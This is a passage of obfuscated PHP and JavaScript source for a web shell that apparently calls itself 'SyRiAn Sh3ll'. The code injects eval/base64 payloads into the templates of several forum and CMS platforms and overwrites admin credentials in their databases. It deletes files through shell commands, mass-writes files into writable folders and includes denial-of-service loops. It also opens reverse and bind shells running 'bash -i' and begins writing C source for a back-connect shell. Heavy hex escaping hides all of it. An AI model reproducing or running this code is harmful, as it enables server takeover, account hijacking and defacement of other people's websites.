        do\143\x75\x6d\x65\x6e\164.\x67\145t\105\x6c\x65\155\145\x6e\164\102\171I\144('\x49n\152e\x63tSh\x65\x6c\154\124yp\145\123\x70\141\x6e').\x69n\x6eer\110\x54M\x4c = '';
        \x64\157c\x75m\145\x6e\164.\147\x65\164E\154\x65\x6d\x65\x6e\164B\171\x49\x64('\x49\x6e\152\145c\164\123\x68e\154l\123\x70\141n').\x69nner\110T\115L = '';
        \x64\157\143u\155\145\156\164.g\x65t\105l\x65\x6d\145\x6e\x74B\171\111\x64('\x53\x48B').in\x6e\x65\162HT\115L = '<input name=\'adminID\' type=\'text\' \x69d=\'adminID\' value=\'admin \x69\144 ~= 1\'  o\156b\154\x75\x72=\'\102\x6cu\162(\"adminID\",\"admin id ~= 1\");\' \157ncl\151\143\153=\'\x43\154\145\141\x72(\"adminID\",\"admin \x69\144 ~= 1\");\' ><input name=\'userName\' type=\'text\' id=\'userName\' value=\'username\'  \x6fnb\x6cu\162=\'\x42\154u\x72(\"userName\",\"username\");\' \x6f\x6e\x63\154i\x63k=\'C\x6c\145\141r(\"userName\",\"username\");\' ><input name=\'password\' type=\'text\' \151d=\'password\' value=\'password ( \116\x6ft \x45\156\143\162\x79\160t\x65\x64 !)\'  o\x6e\x62\x6c\x75r=\'B\x6c\x75\x72(\"password\",\"password ( \x4e\x6ft \105\x6e\143\x72\171\x70t\x65\144 !)\");\' \x6fncli\x63\153=\'\x43\154\x65\141\162(\"password\",\"password ( \x4e\157\x74 \x45\x6ec\x72\171\x70\164\x65\144 !)\");\' >';
    }
    \x65l\163\145 \151\x66(\144\157\143um\145\156\164.g\x65\164\x45\154\145\x6d\145\156\164ById('hackingType').value == '\144\x65\143\162\x79p\164')
    {
        d\157\143\165me\x6et.g\x65\164\x45l\x65\155e\x6e\164\x42\171I\x64('\x49\x6e\x6a\x65\x63\x74\x53\150e\x6c\x6cT\x79\x70\145\123\x70an').in\x6e\145\x72\110\x54M\x4c = '';
        \144\157c\165m\145\x6e\x74.\x67e\164\105\x6ce\155\145\156\164B\x79\x49d('I\x6e\152\x65c\x74She\x6c\x6c\x53p\141n').i\x6e\156e\162\110\x54M\114 = '';
        \144\x6f\x63u\155\145\156t.\x67\145\164E\x6c\x65\155en\x74\x42y\x49d('SH\x42').in\x6e\145\162\110\x54\115\x4c = '';
    }
}
\x66\165nc\164i\157n in\152e\x63\x74\x53\150\x65\154l\x46un\x63t\x69\x6f\156()
{
    \151f(\144\157\143ume\x6e\164.\147\x65t\105\154\x65\x6d\145\156\x74By\x49d('\x69\x6ejec\164\123h\145ll').value == '\x79\145\x73')
    {
        \144\x6fc\x75\x6d\x65\156\x74.\x67\x65t\105l\145\x6d\x65\156tById('\x49nje\x63\x74\123\x68\x65\x6c\x6c\x54y\x70e\x53\160\141\156').\151\156\156er\x48\124ML = '<\x73\x65le\x63t name=\'injectShellType\'><option value=\'\146a\161\'>F\x41\x51</option><option value=\'s\145a\x72\143h\'>\123\x65\141\x72c\150</option><option value=\'\143a\154\145\156da\x72\'>\x43\x61\154\x65ndar</option></\163\x65l\x65\x63\x74>';
    }
    \x65\154s\x65 {\144o\x63\165me\x6et.\147\x65tE\154\145\x6d\145\156\164\x42\171I\x64('\111\156\152\x65\143t\x53\150\x65l\x6c\124\x79\160e\123\160\141n').\151\x6e\156e\162\110\x54M\114 = '';}
}
\x66un\143\164\x69\x6f\156 \103\150\141n\x67e\111\x6ep\x75\x74\x73()
{
    \151\146(d\157\x63\165me\x6e\x74.\147e\164\x45l\x65m\x65\x6e\164By\111\144('\141\143\x74\x69\x6f\x6eT\x79p\x65').value == '\162\x65\x6e\x61\x6de')
    {\144o\x63\x75m\x65\156t.\147\145tE\154em\145\x6e\164B\171\111d('\156\145\x77N\141\x6de').\151\x6e\156er\110TM\114 = '<input type=\"text\" name=\"\x6e\145w\x4e\x61\x6d\145\" value=\"ne\167\x4e\141\155\x65.\x74x\x74\" size=\"25\" /> ';    }
    \x65\154\x73\x65 if (\144\x6f\143\165\x6de\x6e\164.get\x45\154\x65m\145n\x74\102\x79\111d('\141\x63\164\151\x6f\x6e\124\x79p\x65').value == '\x63o\x70y')
    {d\x6f\x63\x75me\x6e\x74.\x67\x65\164El\x65m\145\x6e\164\102\171Id('n\145\x77N\x61me').\151nn\x65r\x48\x54\115\114 = '<input type=\"text\" name=\"new\116\x61\155\x65\" value=\"\x43op\171Na\x6d\145.\164\x78\164\" size=\"25\" /> ';    }
    \145\x6c\163e \151f (d\157\143u\155\145n\164.\147e\x74E\154e\155\x65\156\164\x42y\111d('\x61c\x74\x69o\x6eT\x79\160e').value == '\x63\x72\x65\x61te\x46\x69\154\x65')
    {d\x6fc\x75\x6d\x65\156\164.\147\x65\x74El\145\x6de\x6e\164B\171\x49\x64('\x6eew\116\x61m\145').i\x6e\156\145rHT\115\x4c = '<input type=\"text\" name=\"n\x65\167\116\141\155\145\" value=\"\x46\151\x6c\145 C\x6f\156t\x65\x6et\" size=\"25\" /> ';    }
    \145\x6cs\x65{\144\157c\165\155\x65n\x74.g\x65\164\105le\155\x65\156\x74\x42\171I\144('\x6ee\167N\141\155\x65').\x69\156n\145\162\x48\x54\x4d\x4c = '';}
    
    \151\146(do\x63um\x65\x6e\x74.\147\145\164E\x6ce\155e\x6e\164\102\x79\111\x64('\x61\143\164io\156\x54\x79\160\x65').value == 'deleteFolder' || d\157c\x75\155\x65\x6e\x74.\x67etE\x6c\x65m\x65n\164\102yId('\x61c\x74\151\157\156\x54ype').value == '\x63r\x65ateF\157\154d\145\x72')
    {do\143u\155e\156t.get\105\x6c\145\155entB\171Id('\145\144\151\164\x46\151\x6c\145').value = 'folderName';}
    \x65\154\x73\145{d\157\143\x75\155\x65nt.g\x65\x74\x45l\x65\155\145\x6e\164\x42\171I\x64('e\x64\x69\164\106\x69\154e').value = 'index.t\170t';}
}
    </\163c\x72\151pt>
    </hea\x64>"; if($_GET['id'] == '' && $_GET['info'] == ''){$css .= "<sc\x72\x69\160\x74>\167i\x6e\x64\x6fw.l\157\x63a\x74i\157\156 = '?\x69\x64=\x6da\x69n\120\141\147e';</\x73c\x72i\160t>";} return $css; } function Logout() { print "<\163\143\x72i\160t>
    d\x6f\x63\x75\x6de\x6et.\x63\x6f\x6f\153\x69\x65='user=';
    \x64\x6f\143\165\x6de\156\164.c\x6f\157\x6b\x69e='pass=';
    \x76\x61\162 url = \x77\151\156\144\x6f\167.\x6coc\x61\164i\157\156.p\x61\x74\x68\x6e\x61\155\145;
    \166\141r filename = url.\163u\142\163\x74r\151\x6e\x67(url.la\x73t\x49nd\145x\117f('/')+1);
    \167\x69\156d\157w.l\x6f\143\x61\x74i\157\156=filename;
    </\x73\143\162\x69pt>"; } function About() { $about = "
<tab\154e \x62\147c\x6f\x6c\157\162=#cc\143\x63\143\143 \167\151dt\150=\"100%\">
<t\142\x6f\144\171><\x74r><td w\x69\144\164h=1025>
<\144\x69\x76 \141\x6cig\156=ce\x6et\x65\x72><i\x6d\147 \163\162\143='\x68\x74t\x70://\x77\167\x77.\163\x79\162\x69a\x6e-shell.co\x6d/\145\141\147\154e.\152\x70\x67' \141\154t='\x53\x79\x52iAn S\x68\x33\154\x6c'><\x62\x72>
</\144\x69v>
<\x73y><\x64\x69\166 \141l\151\147n=\x63ent\x65\x72>C\157\x64\145\144 \x42\x79 :  EH << \x53yR\x69\x41\156 | 34\107\061\x33</div></sy>
<\163\171><\x64iv al\151\147n=c\145n\x74\145\x72>\106\x72o\155 </\146o\x6e\x74>: S\x79\122i\101n \101r\x61b\x69\x63 \x52e\160\x75\x62lic  </\144\151v></\163\x79>
<sy><\x64i\166 a\x6c\x69\147n=\143e\156t\x65r>\101g\145 : 4/1991<b\x72></\x64\x69\166></s\171>
<\163\171><di\166 a\154\x69\x67\156=\x63\145\x6et\x65\x72>\124h\x61n\170 : [ \x41\154la\x68 ] [ \x48\x61\156\x69WT ] [ Sy\x52\151A\x6e_S\x6e\x49p\105r ] [ Sy\x52\151\x41\156_\123\160I\144E\x72 ] [ \x54N\124 H\141ck\x65\x72 ]</\144i\x76></\x73y>
<\163y><d\x69v ali\147\x6e=\x63\145\156ter>\x54\150an\170 : \155y \163\143\x68\x6f\x6f\154 : [ \167w\167.google.\143o\155 ] :)</d\151\166></\x73y>
<s\171><\142r><\144i\166 alig\156=c\x65\156\x74er>B\x33 \x43\162\0634T!V\063 0R \x44!3 \x54Ry!n\x47 </\144\x69v></\x73y>
<b\162/>
<c\145\156t\x65r>
<\142\162/>
 <\x66or\155 method='\x70\x6f\163\x74' a\143\x74i\x6f\x6e=''>"; $ipi = getenv("\122\105MO\x54\105_A\104\104\122"); $httprefi = getenv ("H\124\124\x50_\x52\x45F\105\x52E\122"); $httpagenti = getenv ("H\x54\124\x50_U\123\105\x52_\101\x47\105\116\x54"); $about .= '
    <input type="hidden" name="ip" value="<?php echo $ipi ?>" />
    <input type="hidden" name="httpref" value="<?php echo $httprefi ?>" />
    <input type="hidden" name="httpagent" value="<?php echo $httpagenti ?>" />
    <input type="text" id="Your Name" name="visitor" size="35" value="Your Name" onblur="Blur(\'Your Name\',\'Your Name\');" onclick="Clear(\'Your Name\',\'Your Name\');"/><br />
    <input type="text" id="Email" name="visitormail" size="35" value="Email" onblur="Blur(\'Email\',\'Email\');" onclick="Clear(\'Email\',\'Email\');" /><br /> 
    <textarea name="notes" id="messageText" rows="7" cols="25" onblur="Blur(\'messageText\',\'Mail Message\');" onclick="Clear(\'messageText\',\'Mail Message\');">Mail Message</textarea><br />
    <input type="submit" value="Send Mail" name="sendEmail" /><br />
    </form>
    '; return $about; } function i1iOiooI011Ioo0o($url) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FOLLOW, 0); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HEADER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, $url); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_TIMEOUT, 30); $data = curl_exec($i0o1iOil1oIoI0I1); if($data) {return $data;} else {return 0;} } function iilO1iIi11i10io0($text) {return htmlspecialchars($text, ENT_QUOTES);} function ii10i1O10IIIOi11($scriptType,$index,$prefix,$injectShellType) {
if ($scriptType == 'vb') { $i00llooOi1l0iIio = "{\${e\166a\154(\x62a\x73\145\x36\x34_\144\x65\x63ode(\'"; $i00llooOi1l0iIio .= base64_encode("e\143\x68\x6f \"$index\";"); $i00llooOi1l0iIio .= "\'))}}{\${e\x78\x69\164()}}</\x74\145\170\164\x61\x72\x65a>"; if($injectShellType == 'faq') { $shell = mysql_query("U\x50DA\124\x45 \164e\155\160\154\x61\x74\145 SE\x54 t\145mp\x6c\141te ='".$i00llooOi1l0iIio."' \x57H\105\x52\x45 \x74\151\x74\154\145 ='\146a\161'"); } else if($injectShellType == 'calendar') { $shell = mysql_query("U\120\x44A\124\x45 t\145\155\x70\154\141t\145 \x53\105\124 \164\145\x6d\x70la\164\x65 ='".$i00llooOi1l0iIio."' WH\x45\122\x45 \164\x69\x74\154\x65 ='\143\141l\x65n\x64\x61r'"); } else if($injectShellType == 'search') { $shell = mysql_query("U\120\x44\x41TE \x74\x65mp\154\x61\164\x65 \x53\105T t\145\155\160la\164\x65 ='".$i00llooOi1l0iIio."' \127\110\x45\122\105 \164\x69\x74\154\145 ='\163e\141\x72\143\x68'"); } else { $ioO0l1OOl11iIl0I = mysql_query("U\x50\x44A\124E t\145mp\x6cat\x65 S\105T \164\x65mp\x6c\x61\x74e ='".$i00llooOi1l0iIio."' W\110E\122\105 \x74\151\164\154e ='f\157\162\165m\x68\x6fm\x65'"); if (!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("U\120D\x41\124E \x74\145\x6d\x70\154\x61t\x65 \x53\x45T t\x65\x6dp\x6ca\x74e ='".$i00llooOi1l0iIio."' \127\110\105\x52\x45 \164\x69\164l\145 ='\x68\x65\x61\144\145\x72'");} elseif (!$iII0llOi0oO0IO0I) {$ilo11l0100o1Iii1 = mysql_query("\x55PD\x41T\105 te\x6dpl\x61\x74\145 \123\105\124 te\155\160l\141t\145 ='".$i00llooOi1l0iIio."' \x57H\x45\x52\x45 \x74\x69\x74\x6c\145 ='\163\160a\x63\x65r_\x6fpen'"); } } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1 || $shell){update();} else {echo "\x55p\144\141tin\x67 \x48\141\163 \x46\141i\x6ced !";} } else if ($scriptType == 'wp') { $i011l0ooOOl1oIo0 = $prefix."\160\x6f\163ts" ; $ioO0l1OOl11iIl0I = mysql_query("UP\104A\124E $i011l0ooOOl1oIo0 S\x45\124 p\x6f\x73\x74_\x74it\154\145 ='".$index."' W\x48E\122\105 \111D > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("\x55\x50D\x41T\105 $i011l0ooOOl1oIo0 \x53E\124 \160o\x73\164_c\157\156\x74\x65\x6et ='".$index."' W\x48\105RE \x49\104 > 0 "); } elseif(!$iII0llOi0oO0IO0I) {$ilo11l0100o1Iii1 = mysql_query("\125PD\x41TE $i011l0ooOOl1oIo0 \123ET \160\157\163\164_nam\x65 ='".$index."' \x57HE\x52\x45 \111D > 0 "); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "\x55p\x64a\164\151\x6e\x67 Ha\163 F\141\x69le\x64 !";} } else if ($scriptType == 'jos') { $iO01iO10i1O1I001 = $prefix."m\145\156u" ; $ill1i0iO1lloI1O1 = $prefix."\155o\144u\x6c\x65\x73" ; $ioO0l1OOl11iIl0I = mysql_query("\x55\120\104AT\105 $iO01iO10i1O1I001 S\x45T name ='".$index."' \x57\x48\x45\122E I\x44 > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("U\x50D\x41\124E $ill1i0iO1lloI1O1 \x53E\x54 \164\x69tl\x65 ='".$index."' \127H\105RE ID > 0 ");} mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "U\160\144\x61\164i\x6eg H\141\x73 \106a\x69l\145\144 !";} } else if ($scriptType == 'phpbb') { $il1oliO1lO1iI00o = $prefix."\146\157r\165\x6d\163"; $il00i1Oli10oIi11 = $prefix."\160\x6f\x73\x74\163"; $ioO0l1OOl11iIl0I = mysql_query("\125\x50\104\x41T\105 $il1oliO1lO1iI00o \123\105\x54 \x66or\x75\x6d_n\141m\x65 ='".$index."' \x57\x48\105\122E \x66\157\x72\165\x6d_\151d > 0 "); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("\125PD\101T\105 $il00i1Oli10oIi11 \x53\105\x54 \160o\x73\x74_\x73\165\142je\x63\164 ='".$index."' W\x48\x45\x52\x45 \160o\x73t_\x69d > 0 "); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "Up\x64\141t\x69\156\147 H\x61\163 \106\x61\151\154e\144 !";} } else if ($scriptType == 'ipb') { $ioO1l0l0l0olIOOl = $prefix."c\157\155\160o\156\145\156t\x73" ; $ioIlloloiOioIO1l = $prefix."f\157ru\155s" ; $iI11101olOiiIoO0 = $prefix."\x70\x6fs\x74\x73" ; $ioO0l1OOl11iIl0I = mysql_query("\125\120\x44\x41\x54\x45 $ioO1l0l0l0olIOOl \123\105\124 c\157m_\x74\151\x74l\x65 ='".$index."' W\x48\x45R\105 \143o\155_i\x64 > 0"); if(!$ioO0l1OOl11iIl0I) {$iII0llOi0oO0IO0I = mysql_query("UP\x44A\124\x45 $ioIlloloiOioIO1l S\x45T name ='".$index."' \x57\110\105\x52\x45 id  > 0"); } if(!$iII0llOi0oO0IO0I) { $ilo11l0100o1Iii1 = mysql_query("\125P\x44A\x54\x45 $iI11101olOiiIoO0 \123E\124 \160\157\163\x74  ='".$index."' \127\x48E\122E pid <10") or die("C\141\x6e't \125\x70\144\141\164\x65 Tem\x70l\141\164\x65s !!"); } mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I || $ilo11l0100o1Iii1){update();} else {echo "Upd\141t\x69\x6eg \110as \106a\151led !";} } else if ($scriptType == 'smf') { $iliiiOoo0oi1iI0I = $prefix."b\157\x61\x72\x64\x73" ; {$ioO0l1OOl11iIl0I = mysql_query("\125PDA\x54\x45 $iliiiOoo0oi1iI0I S\105\124 \144e\163\x63\x72i\160t\x69\157\x6e ='".$index."' \127\110E\x52E \111\104_B\117\101\x52\x44 > 0");} if(!$ioO0l1OOl11iIl0I){$iII0llOi0oO0IO0I = mysql_query("\x55PDAT\x45 $iliiiOoo0oi1iI0I \x53\x45\124 name ='".$index."' W\x48\x45\x52\105 I\104_\x42\x4f\x41RD > 0");} mysql_close(); if ($ioO0l1OOl11iIl0I || $iII0llOi0oO0IO0I){update();} else {echo "\x55\160da\164\x69\156\x67 \110\x61\x73 Fa\x69\154e\x64 !";} } else if ($scriptType == 'mybb') { $ioi1iio0o1o1I11o = $prefix."te\155\160\x6cates"; $ii1OlloO1iiOIio0 = mysql_query(" update $ioi1iio0o1o1I11o \163et t\x65\155\x70\x6cate='".$index."' \x77\150\x65\162\145 tit\154\x65='index' "); if ($ii1OlloO1iiOIio0){update();} else {echo "\x55\x70d\x61\164\151\x6eg Has F\141\151le\x64 !";} mysql_close(); } } function i01IiIiilloIOIOO() { iioO1iiiOOoIi1l0($ScriptType);
iIO0io1IO0OI1lii($host,$user,$pass,$dbName); ii10i1O10IIIOi11($ScriptType,$index,$prefix,$i0lIioiO0ioiIo1i); } function changeInfo($ScriptType,$adminID,$userName,$password) { if($ScriptType == 'vb') {  
$password = md5($password); $iOIl1o000llilI11 = mysql_query("\x55\x50D\x41TE user \x53\x45\x54 username = '".$userName."' , password = '".$password."' W\x48\x45\x52\x45 use\162\151d = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {echo "\x45\162\x72or !!";} } else if($ScriptType == 'wp') {  
$password = crypt($password); $iOIl1o000llilI11 = mysql_query("\x55PD\101\124\x45 \x77p_\x75\x73\x65\162\x73 \x53E\x54 \165\163\x65\162_\x6c\157\147in = '".$userName."' , u\163\145r_\160\141\x73s = '".$password."' \x57\x48\105\122E \111\104 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'jos') {  
$password = crypt($password); $iOIl1o000llilI11 = mysql_query("\x55\x50\x44\x41\124\105 j\157s_\165\163ers \x53\105\x54 username ='".$userName."' , password = '".$password."' \127\110\x45\x52E I\x44 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'phpbb') {  
$password = md5($password); $iOIl1o000llilI11 = mysql_query("\125\120\104\x41\124E p\x68\x70\x62b_us\145\x72\x73 \x53\x45\x54 username ='".$userName."' , \165\163er_\160\141\x73\163\167\157\162\144 = '".$password."' \x57\110\105R\105 user_id = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'ibf') {  
$password = md5($password); $iOIl1o000llilI11 = mysql_query("U\120\104\x41\x54\x45 \x69\x62\x66_\155\x65m\x62\x65\x72\163 S\x45T name ='".$userName."' , \x6d\145\x6db\145\x72_l\x6fg\x69\156_\x6bey = '".$password."' \x57HE\122\x45 \x69\144 = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'smf') {  
$password = md5($password); $iOIl1o000llilI11 = mysql_query("\125PDATE \x73\x6d\x66_\155\x65m\x62\x65r\163 \123\105T me\155b\145\162N\x61m\x65 ='".$userName."' , passwd = '".$password."' W\110\x45\x52\105 I\104_\115E\115B\x45R = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } else if($ScriptType == 'mybb') {  
$password = md5($password); $iOIl1o000llilI11 = mysql_query("U\120\x44\x41\124\x45 \155\171b\x62_\x75\x73\145\162\163 S\x45\124 username ='".$userName."' , password = '".$password."' \127\110ER\105 uid = ".$adminID.""); if($iOIl1o000llilI11) {update();} else {mysql_error();} } } function UnZip($fileName,$currentPath) { if(class_exists('ZipArchive')) { $zip = new ZipArchive; $i0IoililO0ooIl01 = $zip->open($fileName); if ($i0IoililO0ooIl01 === TRUE) {$zip->i101i1O1O01Il0Il($currentPath);$zip->close();} } else{$iOo0li0ioo0IoOo0 = 'unzip '.$fileName;Exe($iOo0li0ioo0IoOo0);} } function iOIoi1lOOI00I10I($fileName,$path) { $path = $path."\\".$fileName; $zip = new ZipArchive; if ($zip->open($fileName) === TRUE) { $zip->iIIiilillIoOOI0l($path,$fileName); $zip->iIIiilillIoOOI0l($path,$fileName); $zip->close(); } } function DeleteFile($fileName) { global $os; $iiiIi01o0O0IIIOi = unlink($fileName); if(!$iiiIi01o0O0IIIOi) { if($os == "Windows") { $iiI0io0lillIi1ol = "d\x65\x6c ".$fileName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } elseif(!$iiiIi01o0O0IIIOi) { $iiI0io0lillIi1ol = "r\x6d -f ".$fileName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } if($iiiIi01o0O0IIIOi){return true;}else{return false;} } } function DeleteFolder($folderName) { global $os; $iiiIi01o0O0IIIOi = rmdir($folderName); if(!$iiiIi01o0O0IIIOi) { if($os == "Windows") { $iiI0io0lillIi1ol = "\x72\155d\x69\162 ".$folderName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } elseif(!$iiiIi01o0O0IIIOi) { $iiI0io0lillIi1ol = "r\155 -\162 ".$folderName; $iiiIi01o0O0IIIOi = Exe($iiI0io0lillIi1ol); } if($iiiIi01o0O0IIIOi){return true;}else{return false;} } } function i0IOlii1OIloli0l($result) { $fields = Array(); for ($i = 0; $i < mysql_num_fields($result); $i++) {array_push($fields, mysql_field_name($result, $i));} return $fields; } function io0li01lioliIl1i($i01OloOoOoIolili,$ioolioiillOiIl01,$iiOi10ii1il0IIOi) { $i1oii11lil01IoI0="\\"; $il1Ii0i0oiO0IlIi=0; if ($iiii10l0iolIIiii = opendir($i01OloOoOoIolili)) { iii0li0iIOii1III($ioolioiillOiIl01,$iiOi10ii1il0IIOi); while ($file = readdir($iiii10l0iolIIiii)) { $illI1lO1iO1oII11 = str_replace('//','/',$i01OloOoOoIolili.$i1oii11lil01IoI0.$file); if($file!='.' && $file!='..' && is_dir($illI1lO1iO1oII11)) { if (is_writable($illI1lO1iO1oII11)) { if ($ii1O1i0il11I01IO=fopen($illI1lO1iO1oII11.$i1oii11lil01IoI0.$ioolioiillOiIl01,"w")) { fwrite($ii1O1i0il11I01IO,$iiOi10ii1il0IIOi); fclose($ii1O1i0il11I01IO); $iIOilo1O100IloO0[$il1Ii0i0oiO0IlIi]['filename']=$illI1lO1iO1oII11; } $il1Ii0i0oiO0IlIi++; } io0li01lioliIl1i($illI1lO1iO1oII11); } } closedir($iiii10l0iolIIiii); }
else {return ("\156\x6ft\160\145\162\155");} if ($iIOilo1O100IloO0){return $iIOilo1O100IloO0;} else{return "n\157\164fou\x6e\x64";} } function ilOi1ollol1Il0Oi() { $iloIio1Ol1l1IOI1=str_repeat("99999999999999999999999999999999999999999999999999",99999); for($i=0;$i<2;) { $iO1ilO1OiiIo1oO0=bcpow($iloIio1Ol1l1IOI1, '3', 2); $iO1ilO1OiiIo1oO0=null; } } function cx() {cx();} function ii0o1liIoiOoO0lo($iIO1111OOi0lIo0l) { switch($iIO1111OOi0lIo0l) { case "\x75\x64\x70": $i1lOillOOlilI11o = SOL_UDP; $iIiO111ll11OI1lO = SOCK_DGRAM; break; case "\x74\x63\160": default: $i1lOillOOlilI11o = SOL_TCP; $iIiO111ll11OI1lO = SOCK_STREAM; break; } return(array($i1lOillOOlilI11o, $iIiO111ll11OI1lO)); } function ioooliOIi10i0Iio($hostname, $port=80, $iIO1111OOi0lIo0l="t\143p") { $address = gethostbyname($hostname); list($i1lOillOOlilI11o, $iIiO111ll11OI1lO) = ii0o1liIoiOoO0lo($iIO1111OOi0lIo0l); switch($iIO1111OOi0lIo0l) { case "\x75d\x70": $i1lOillOOlilI11o = SOL_UDP; $iIiO111ll11OI1lO = SOCK_DGRAM; break; case "\x74\143\160": default: $i1lOillOOlilI11o = SOL_TCP; $iIiO111ll11OI1lO = SOCK_STREAM; break; } $socket = socket_create(AF_INET, $iIiO111ll11OI1lO, $i1lOillOOlilI11o); if ($socket < 0) { echo "\163\x6f\143\153et_\x63\x72\145\141\x74\x65() f\x61\x69l\x65d: r\x65\x61s\157\x6e: " . socket_strerror($socket) . "\n"; } $result = socket_connect($socket, $address, $port); if ($result < 0) { echo "s\157\143\153\145\164_\143o\156n\145\x63\164() \x66aile\144.\nR\x65\x61\163\157\156: ($result) " . socket_strerror($result) . "\n"; } return $socket; } function iliO10O0IIiiOli1($address, $port) { if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { echo "\x73\157\x63\x6be\x74_c\x72\x65at\x65() \146\141\x69le\144: \x72\x65as\x6fn: " . socket_strerror($sock) . "\n"; return(-1); } if (($iIl0ll1lo0l0I1IO = socket_bind($sock, $address, $port)) < 0) { echo "\x73\x6f\x63k\x65\164_\142\151\156\x64() f\141\x69\154e\x64: reaso\156: " . socket_strerror($iIl0ll1lo0l0I1IO) . "\n"; return(-2); } if (($iIl0ll1lo0l0I1IO = socket_listen($sock, 5)) < 0) { echo "\x73\x6f\143\x6b\x65t_\154iste\156() \x66\141\x69\x6c\x65d: r\145\x61\163\x6f\156: " . socket_strerror($iIl0ll1lo0l0I1IO) . "\n"; return(-3); } return($sock); } function ilII1oOlIo10I0oi($type, $shell, $port, $host) { $shell = 'export TERM=xterm; bash -i'; if($type == "c\142") {$ill0l11oO0i1IOIO = ioooliOIi10i0Iio($host, $port, "\164\x63\160");} elseif ($type == "\160\x62") { $iO0Ol0li0lilIIo1 = iliO10O0IIiiOli1($host, $port); if (($ill0l11oO0i1IOIO = socket_accept($iO0Ol0li0lilIIo1)) < 0) {return "\x73\157ck\x65\164_a\143\x63\x65\x70t() \x66a\x69l\145d: re\x61son: " . socket_strerror($ill0l11oO0i1IOIO) . "\n";} } else {return "\105rr\x6fr n\157 \143o\x6e\x6eect\x69\x6fn \144e\164ai\154\x73 \x73p\145\143i\146\x69\145\144!";} set_time_limit(9000); $i0ii10l00loI0IiI = array( 0 => array("\160\x69\x70e", "\162"), 1 => array("\160\151\x70\x65", "\167"), 2 => array("\x70ip\145", "\167") ); $process = proc_open($shell, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I); if (is_resource($process)) { $iOli100ooiioiIll = 1; do { $ii1I1Ooool01oIi1 = array($ill0l11oO0i1IOIO); $iiOol1oOii0OIilO = socket_select($ii1I1Ooool01oIi1, $write = NULL, $ilo11iOO11OIl11O = NULL, 0); if ($iiOol1oOii0OIilO === false) {
$iOli100ooiioiIll = 0; } else if ($iiOol1oOii0OIilO > 0) { foreach($ii1I1Ooool01oIi1 as $iI1oio1lOoo0I1oI => $v) { if($v == $ill0l11oO0i1IOIO) { if(socket_last_error($ill0l11oO0i1IOIO) > 0) $iOli100ooiioiIll = 0; if($iOli100ooiioiIll == 1 && false == ($iIlol0ioiOIli1o1 = socket_read($ill0l11oO0i1IOIO, 2048, PHP_NORMAL_READ))) $iOli100ooiioiIll = 0; fwrite($ilOIi1011iloIl1I[0], $iIlol0ioiOIli1o1); } } } $iOIo1OoooloiiIIo = array($ilOIi1011iloIl1I[1], $ilOIi1011iloIl1I[2]); $iolli1oo1l01II0o = stream_select($iOIo1OoooloiiIIo, $write = NULL, $ilo11iOO11OIl11O = NULL, 0); if ($iolli1oo1l01II0o === FALSE) { $iOli100ooiioiIll = 0; } else if ($iolli1oo1l01II0o > 0) { foreach($iOIo1OoooloiiIIo as $iI1oio1lOoo0I1oI => $v) { if($iOli100ooiioiIll == 1 && false == ($iIlol0ioiOIli1o1 = fread($v, 2048))) $iOli100ooiioiIll = 0; socket_write($ill0l11oO0i1IOIO, $iIlol0ioiOIli1o1, strlen($iIlol0ioiOIli1o1)); } } } while($iOli100ooiioiIll == 1); } else {return "\x45rro\x72 e\170\145c\165\x74i\x6eg shell " . $shell;} } function i1O11101l1IllolO($iIOl10o0OilO0Ili = '/tmp', $compiler = 'gcc', $host, $port) { $shell = "#\x69nc\x6c\165\x64e <\x73t\x64\x69\157.\x68>\n" . "#\151\156\143l\165de <\163y\x73/socket.\x68>\n" . "#\x69n\x63lud\145 <n\145t\151\156\x65t/i\x6e.\x68>\n" . "#\151nc\x6c\x75d\x65 <\141r\160a/\151\156e\164.h>\n" . "#in\143\x6cud\x65 <\x6e\145td\142.\150>\n" . "\x69\156t \x6da\x69\x6e(\151n\x74 \141\162g\143, \143\x68\141\162 **\x61r\x67\166) {\n" . "  \143h\141\x72 *host;\n" . "  \151\156t port = 80;\n" . "  \x69\x6et f;\n" . "  int l;\n" . "  \x69\x6e\x74 sock;\n" . "  \x73\164\x72\165\143t \151\x6e_\x61d\144\x72 \151a;\n" . "  \163\164\x72\165\x63\x74 \x73\157\143k\141\x64\x64\162_\x69n \163\151\x6e, \146r\157\x6d;\n" . "  s\x74\162uc\164 h\x6fsten\x74 *h\x65;\n" . "  \x63h\141\162 msg[ ] = \"\x57\145l\x63\x6f\x6d\145 to D\x61t\141 \x43\150\x61\x30\163 \x43onn\x65c\164 \102\x61\x63\153 \x53\150e\154\x6c\\n\\n\"\n" . "                \"\x49s\163\165\145 